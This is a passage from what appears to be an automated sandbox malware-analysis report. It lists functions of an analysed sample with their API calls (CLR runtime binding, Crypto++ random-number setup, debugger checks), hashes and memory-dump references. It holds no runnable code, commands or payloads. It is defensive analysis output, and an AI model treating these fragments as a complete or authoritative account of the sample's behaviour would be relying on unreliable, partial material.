                                                                      • Opcode Fuzzy Hash: 337dab79c5a2196e3375339ab159099b615490b3b98113a3ab041dbd079cea32
                                                                      • Instruction Fuzzy Hash: 6AD05E72C05305EACB20FBB4D860B5DBB716F00399FA04115A410A61D4DF3466618E00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F10D4E7 Relevance: 1.5, APIs: 1, Instructions: 6COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _doexit.LIBCMT ref: 6F10D4ED
                                                                        • Part of subcall function 6F10D391: __lock.LIBCMT ref: 6F10D39F
                                                                        • Part of subcall function 6F10D391: RtlDecodePointer.NTDLL(6F1397A0,00000020,6F10D4E2,6F109BD4,00000001,00000000,?,6F10D513,000000FF,?,6F11245F,00000011,6F109BD4,?,6F10EA03,0000000D), ref: 6F10D3DB
                                                                        • Part of subcall function 6F10D391: DecodePointer.KERNEL32(?,6F10D513,000000FF,?,6F11245F,00000011,6F109BD4,?,6F10EA03,0000000D), ref: 6F10D3EC
                                                                        • Part of subcall function 6F10D391: DecodePointer.KERNEL32(-00000004,?,6F10D513,000000FF,?,6F11245F,00000011,6F109BD4,?,6F10EA03,0000000D), ref: 6F10D412
                                                                        • Part of subcall function 6F10D391: DecodePointer.KERNEL32(?,6F10D513,000000FF,?,6F11245F,00000011,6F109BD4,?,6F10EA03,0000000D), ref: 6F10D425
                                                                        • Part of subcall function 6F10D391: DecodePointer.KERNEL32(?,6F10D513,000000FF,?,6F11245F,00000011,6F109BD4,?,6F10EA03,0000000D), ref: 6F10D42F
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: DecodePointer$__lock_doexit
                                                                      • String ID:
                                                                      • API String ID: 3343572566-0
                                                                      • Opcode ID: 71bf41ca4ab6c6b9d5c9b8aa331f48d1f3c4064364d0ec5ab27b06038e4970e1
                                                                      • Instruction ID: 8fffab903e35c73c0cae78e064b9559ed725e82f614e50b5cd931f594970b159
                                                                      • Opcode Fuzzy Hash: 71bf41ca4ab6c6b9d5c9b8aa331f48d1f3c4064364d0ec5ab27b06038e4970e1
                                                                      • Instruction Fuzzy Hash: 81A002B5BD470121F86061512C43F54B1021750F45FD40050BB483C1C0BDD632684057
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F10E936 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlEncodePointer.NTDLL(00000000,6F1182F2,6F14BD18,00000314,00000000,?,?,?,?,?,6F10D6DC,6F14BD18,Microsoft Visual C++ Runtime Library,00012010), ref: 6F10E938
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID:
                                                                      • API String ID: 2118026453-0
                                                                      • Opcode ID: c7ac1d7de5e8e501e7fff7b28d95c2caf6a9cc6407a587200049f4127d96bb5d
                                                                      • Instruction ID: ec904ba40f3cc7b6cd09b9be54712366ff65f070a6e9447092f0c3fa11f25e9e
                                                                      • Opcode Fuzzy Hash: c7ac1d7de5e8e501e7fff7b28d95c2caf6a9cc6407a587200049f4127d96bb5d
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B2278 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PO{q
                                                                      • API String ID: 0-2051472340
                                                                      • Opcode ID: 35e3ecb419fbf356ede85c6f750c1b3afaea2c2d48e720a470b5958e3c3fd80c
                                                                      • Instruction ID: 0aaae21bdac5bdc4374b2bcdef3b532cc23ed68e8a99fc22242942a3a5377fcd
                                                                      • Opcode Fuzzy Hash: 35e3ecb419fbf356ede85c6f750c1b3afaea2c2d48e720a470b5958e3c3fd80c
                                                                      • Instruction Fuzzy Hash: 7B410971B04205AFC748EF68D8909FE7BF6EFC5310B1588AAE115DB361DB349D098B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B0000 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te{q
                                                                      • API String ID: 0-3237916597
                                                                      • Opcode ID: c387b8ea0b5900139354990a0a5b08ac6a0aa1ff48cec82ac09ac7be04e3a5fb
                                                                      • Instruction ID: 5ae904890e20a707e787efabf2e0947a2d9a1bf5ada4307693cb16aa86387c60
                                                                      • Opcode Fuzzy Hash: c387b8ea0b5900139354990a0a5b08ac6a0aa1ff48cec82ac09ac7be04e3a5fb
                                                                      • Instruction Fuzzy Hash: 5631B27560D3C11FCB1BAB7488642AE7FB5AF9B200F0904DAD0459F3D2CA285D09C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B010C Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te{q
                                                                      • API String ID: 0-3237916597
                                                                      • Opcode ID: d8173452b38f74990fd96a99d56f259d7a0d6ac51be2052e33822645851529cb
                                                                      • Instruction ID: bf460d561fab2152d9ddc1c513af8fc78ed92d948911a687fd857a3010a5f283
                                                                      • Opcode Fuzzy Hash: d8173452b38f74990fd96a99d56f259d7a0d6ac51be2052e33822645851529cb
                                                                      • Instruction Fuzzy Hash: F921B175B043465FCB1AABA4C85467EBFB2FF95200F1444AED0469B391CA345D0A97A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B0128 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te{q
                                                                      • API String ID: 0-3237916597
                                                                      • Opcode ID: 3edee3375f11cef465e3c562eeee474684414e86b4275e4d880b9e7213e46e8c
                                                                      • Instruction ID: af2e14474e0aae50d8d1cefe1b57e7d57cc58d57551169d3a28eb839c3a04dda
                                                                      • Opcode Fuzzy Hash: 3edee3375f11cef465e3c562eeee474684414e86b4275e4d880b9e7213e46e8c
                                                                      • Instruction Fuzzy Hash: 5B11C075B1020A5BCB18BBA8C454ABFBBB6FFD8610F544429D106AB390CF359D0A87E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B0048 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te{q
                                                                      • API String ID: 0-3237916597
                                                                      • Opcode ID: 198c9dc8151ed2cbfaac5c3d6bafdc271b4bbc5c135c72e30bf63e54b87b44df
                                                                      • Instruction ID: 197ab32805ad9df5103dea11cc8c3b0578161d8e63cc38a5ad53449456ff3a88
                                                                      • Opcode Fuzzy Hash: 198c9dc8151ed2cbfaac5c3d6bafdc271b4bbc5c135c72e30bf63e54b87b44df
                                                                      • Instruction Fuzzy Hash: 1E11AF74B102165BCB29BBA8D4957BFBAE6FF98600F540468D106AB380CF245D0687E2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B3619 Relevance: 1.1, Instructions: 1057COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f0dad7a78477047b7f876a33a34b387bf7b4a4d1176cd08a72da4fd6bb774688
                                                                      • Instruction ID: 185be499d533d8cd03060dd49514f6e9ce4230cfddcc67e0969dc8f1172b5e54
                                                                      • Opcode Fuzzy Hash: f0dad7a78477047b7f876a33a34b387bf7b4a4d1176cd08a72da4fd6bb774688
                                                                      • Instruction Fuzzy Hash: 6C110624A0C3C28FD75E823989501B67BB25FC5354B0B98ABC436CB392DF24CA16C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B1F98 Relevance: .2, Instructions: 202COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b925345f9a61b910236c68fa46aa6e8162069ddcf51efa389c0ce343e9168b5b
                                                                      • Instruction ID: ceff37bb27a2253375da6013ab538e05d7212b3f158ef058d474d345cb665070
                                                                      • Opcode Fuzzy Hash: b925345f9a61b910236c68fa46aa6e8162069ddcf51efa389c0ce343e9168b5b
                                                                      • Instruction Fuzzy Hash: 8B714D34B00214CFDB88DF68C8909A9B7F2FF88310B169569E906DB361DB31ED45CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B1F4C Relevance: .2, Instructions: 198COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d4bc9234f35713602062050eb288d1e9c917d756fe81940d788f77a9c49dc2f
                                                                      • Instruction ID: 8c5e78553eef00575feed48b3e41abaf4961b28b28c1a8040865f387cb10d744
                                                                      • Opcode Fuzzy Hash: 7d4bc9234f35713602062050eb288d1e9c917d756fe81940d788f77a9c49dc2f
                                                                      • Instruction Fuzzy Hash: 93717F35B04200CFDB89CF68C9A09A9BBF1FF49310716959AE906DB362D731ED05CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B0848 Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4dec9441b1a55e2fe55c5f1a2cb92cb463747d1950b2904d0204c95f77ad3a25
                                                                      • Instruction ID: 8a532ea097e891ca96964406dbbd9803ad35f8655886ebf9ab0e867999541789
                                                                      • Opcode Fuzzy Hash: 4dec9441b1a55e2fe55c5f1a2cb92cb463747d1950b2904d0204c95f77ad3a25
                                                                      • Instruction Fuzzy Hash: B9119A393043509FC74AEB68C894D697BF5FF8A61434644EAE10ACF372DA309C05CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B0868 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 43fff17aec5e16b1bdb31e446ec75197781a366c67723c2060a8ebd380ead259
                                                                      • Instruction ID: 2939c4d7c3193c4dcce811b66d9b7fe6ef9187eb8671edfa7d43dd151d21b85d
                                                                      • Opcode Fuzzy Hash: 43fff17aec5e16b1bdb31e446ec75197781a366c67723c2060a8ebd380ead259
                                                                      • Instruction Fuzzy Hash: 260125393102119FC748EB6DD894C2EBBEAFF9961534144A9E10ACB371DE31EC028B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B21DA Relevance: .0, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0265bd5287ca92dd38e472a2d9d686cf3168d2865bf55e864beb57ea42a81f6
                                                                      • Instruction ID: 082026f818f17938de415a7821602a09fa04b9a00a9163424c01b746c333a1ce
                                                                      • Opcode Fuzzy Hash: d0265bd5287ca92dd38e472a2d9d686cf3168d2865bf55e864beb57ea42a81f6
                                                                      • Instruction Fuzzy Hash: 6601B530F002565BD704DBF999906BFB7B7FFD9210F288469DA14A7340CB31A90787A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B21E0 Relevance: .0, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f72995c348dba16002392f3a501cb90e07e02846319bee06faded09882272e44
                                                                      • Instruction ID: a7ff510e32487db5fd59f79d7fa9b9316988ad80447d0da3bfede885c56ea566
                                                                      • Opcode Fuzzy Hash: f72995c348dba16002392f3a501cb90e07e02846319bee06faded09882272e44
                                                                      • Instruction Fuzzy Hash: 84017531F102165BD704DAAA9990AAFB7BBBBD4610F248429DA14A7344CF71AD0687A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 6F0BA0C0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 227libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6F130634,6F130738,?), ref: 6F0BA119
                                                                      • GetModuleHandleW.KERNEL32(mscorwks), ref: 6F0BA145
                                                                      • __cftoe.LIBCMT ref: 6F0BA1FB
                                                                      • GetModuleHandleW.KERNEL32(?), ref: 6F0BA215
                                                                      • GetProcAddress.KERNEL32(00000000,00000018), ref: 6F0BA265
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressBindProcRuntime__cftoe
                                                                      • String ID: mscorwks$v2.0.50727$wks
                                                                      • API String ID: 1312202379-2066655427
                                                                      • Opcode ID: e53dd48f309253c15337f89b1c9f6d44f27bbd7f9ca91eb93f9480e84b426e38
                                                                      • Instruction ID: e9b0d391ee5c325ccd36d7a847fa5dcadbb25659e727d2fb2ed537eb7722e4e4
                                                                      • Opcode Fuzzy Hash: e53dd48f309253c15337f89b1c9f6d44f27bbd7f9ca91eb93f9480e84b426e38
                                                                      • Instruction Fuzzy Hash: 979179B1D042499FDB04DFE8C984A9EBBF5BF49310F20866EE519EB380D731A945CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0FDBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,F3D820D6,6F128180,00000000,?), ref: 6F0FDBFB
                                                                      • GetLastError.KERNEL32 ref: 6F0FDC01
                                                                      • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6F0FDC15
                                                                      • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6F0FDC26
                                                                      • SetLastError.KERNEL32(00000000), ref: 6F0FDC2D
                                                                        • Part of subcall function 6F0FD9D0: GetLastError.KERNEL32(00000010,F3D820D6,762501B0,?,00000000), ref: 6F0FDA1A
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0FDC78
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
                                                                      • String ID: CryptAcquireContext$Crypto++ RNG
                                                                      • API String ID: 3279666080-1159690233
                                                                      • Opcode ID: 6b576df6db2a330380d6c49bc8f4cbca0388e30e5f748e2a6c0f34ab10c9756c
                                                                      • Instruction ID: ddfab103c7e05a3c988b856422663f9adc52b948ef72c569531d511ecbaa2418
                                                                      • Opcode Fuzzy Hash: 6b576df6db2a330380d6c49bc8f4cbca0388e30e5f748e2a6c0f34ab10c9756c
                                                                      • Instruction Fuzzy Hash: 92219F71248701AFE310EB64CC45F5BBBE8BB997A4F40091EF541A62C0EBB6A055CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F10948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 6F10CE6C
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F10CE81
                                                                      • UnhandledExceptionFilter.KERNEL32(6F129428), ref: 6F10CE8C
                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 6F10CEA8
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 6F10CEAF
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                      • String ID:
                                                                      • API String ID: 2579439406-0
                                                                      • Opcode ID: 52f322693a266304c26abb5ada2fee5c4e422b0867ef211814e73a79ed7fdf91
                                                                      • Instruction ID: 501cfd806fcf97fc099ca70474ab12bb9ad5d314dcc385e7a4b56e2b8ffd3cf2
                                                                      • Opcode Fuzzy Hash: 52f322693a266304c26abb5ada2fee5c4e422b0867ef211814e73a79ed7fdf91
                                                                      • Instruction Fuzzy Hash: 822103B4808A04DFCF11EF68D5446483BB4FB8A3F4F60401AE50987B41EBB055B8CF2A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0FDE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptGenRandom.ADVAPI32(?,?,?,F3D820D6,00000000), ref: 6F0FDE6F
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0FDEB9
                                                                        • Part of subcall function 6F0FDD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6F11F0E6,000000FF,6F0FDF67,00000000,?), ref: 6F0FDDB4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$ContextException@8RandomReleaseThrow
                                                                      • String ID: CryptGenRandom
                                                                      • API String ID: 1047471967-3616286655
                                                                      • Opcode ID: 39138879f72550a6f5d07597ac789f33ca07f723d9b3fe98781e7dde164bf005
                                                                      • Instruction ID: 1c7b40a6afa83643ee9f4e368530e3ee597accf7ba49b410dc9410f3cd12effb
                                                                      • Opcode Fuzzy Hash: 39138879f72550a6f5d07597ac789f33ca07f723d9b3fe98781e7dde164bf005
                                                                      • Instruction Fuzzy Hash: FB2189710097409FC300EF64C444B5BBBEAFB997A8F004A1EF8A597280EB75E518CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0FD9D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 126COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000010,F3D820D6,762501B0,?,00000000), ref: 6F0FDA1A
                                                                        • Part of subcall function 6F0A4010: std::_Xinvalid_argument.LIBCPMT ref: 6F0A402A
                                                                      Strings
                                                                      Memory Dump Source
